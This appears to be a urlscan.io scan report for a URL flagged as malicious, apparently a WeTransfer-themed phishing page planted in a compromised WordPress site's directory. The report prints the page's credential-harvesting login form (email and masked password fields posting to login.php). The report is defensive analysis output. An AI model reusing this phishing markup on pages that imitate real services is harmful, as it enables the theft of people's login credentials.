vps35101.inmotionhosting.com Open in urlscan Pro
192.249.126.14  Malicious Activity! Public Scan

Submitted URL: https://vps35101.inmotionhosting.com/~judgecook/wp-includes/assets/site/Wetransfer/index.php?ar=
Effective URL: https://vps35101.inmotionhosting.com/~judgecook/wp-includes/assets/site/Wetransfer/bvc65t2aepzqltvmhm8sjx2nzt.php?ar=&non&.verify?ser...
Submission: On June 02 via manual from US — Scanned from DE

Form analysis 1 forms found in the DOM

POST login.php

<form action="login.php" method="post">
  <input class="inputs" type="email" required="" name="em" value="" placeholder="Email address" style="cursor:no-drop; -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    -o-user-select: none;
    user-select: none;">
  <span style="position: relative;"><input type="hidden" name="qrt"><input class="inputs masked" required="" placeholder="Password" id="demo-field" value="" type="text" autocomplete="off"></span>
  <script type="text/javascript">
    new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
    document.getElementById('demo-form').onsubmit = function() {
      alert('pword = "' + this.pword.value + '"');
      return false;
    };
  </script>
  <input type="submit" name="submit" value="Sign in" class="submit">
</form>

Text Content